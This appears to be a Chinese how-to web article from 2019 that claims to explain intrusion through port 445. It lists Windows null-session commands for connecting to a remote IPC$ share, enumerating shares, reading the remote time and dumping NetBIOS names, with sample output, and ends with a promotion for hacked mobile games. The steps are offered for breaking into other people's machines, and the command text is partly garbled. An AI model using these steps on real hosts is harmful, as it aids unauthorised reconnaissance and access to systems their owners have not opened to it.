445端口入侵的操作方法

更新:2019-09-29 16:44:12来源:吾爱经验软件园

      前段时间不少朋友都遭遇了勒索病毒的侵扰,很多人已经关闭了445端口;那么病毒是如何借助445端口进行入侵的呢?445端口入侵需要设置才有效;如何操作才能实现445端口入侵的目标呢?除非掌握了电脑基础知识,否则一般人是不具备445端口入侵的操作技能的;小编这里简要说两点,你就明白了;1、先建立一个空回话;2、查看远程主机的共享资源命令,然后连接即可;你看是不是挺简单;若有兴趣,可以看看下面介绍的关于445端口入侵的操作方法。

方法/步骤

1:首先,我们先建立一个空会话(当然,这需要目标开放 ipc$ ) 命令: net use \ipipc$ "" /user:"" 注意:上面的命令包括四个空格, net 与 use 中间有一个空格, use 后面一个,密码左右各一个空格。

445端口入侵的操作方法

2:查看远程主机的共享资源 命令: net view \ip 解释:前提是建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开了共享,可以得到如下面的结果,但此命令不能显示默认共享。 在 \*.*.*.* 的共享资源 资源共享名 类型 用途 注释 ----------------------------------------------------------- NETLOGON Disk Logon server share SYSVOL Disk Logon server share 命令成功完成。 

445端口入侵的操作方法

3:查看远程主机的当前时间,命令: net time \ip解释:用此命令可以得到一个远程主机的当前时间。

445端口入侵的操作方法

4:得到远程主机的 NetBIOS 用户名列表(需要打开自己的 NBT ) 命令: nbtstat -A ip 用此命令可以得到一个远程主机的 NetBIOS 用户名列表,返回如下结果: Node IpAddress: [*.*.*.*] Scope Id: [] NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- SERVER <00> UNIQUE Registered OYAMANISHI-H <00> GROUP Registered OYAMANISHI-H < 1C > GROUP Registered 

445端口入侵的操作方法

5:SERVER <20> UNIQUE Registered OYAMANISHI-H <1B> UNIQUE Registered OYAMANISHI-H <1E> GROUP Registered SERVER <03> UNIQUE Registered OYAMANISHI-H <1D> UNIQUE Registered ..__MSBROWSE__.<01> GROUP Registered INet~Services < 1C > GROUP Registered IS~SERVER......<00> UNIQUE Registered MAC Address = 00-50-8B -9A -2D-37

445端口入侵的操作方法

欢迎玩家到【吾爱经验软件园】查看最新变态版手游攻略,只需要在百度输入【吾爱经验软件园】就可以浏览最新上线送满vip的变态手游攻略了,更多有关BT手游的攻略和资讯,敬请关注游戏玩家!

更多...

相关文章

热门手机应用

最新软件资讯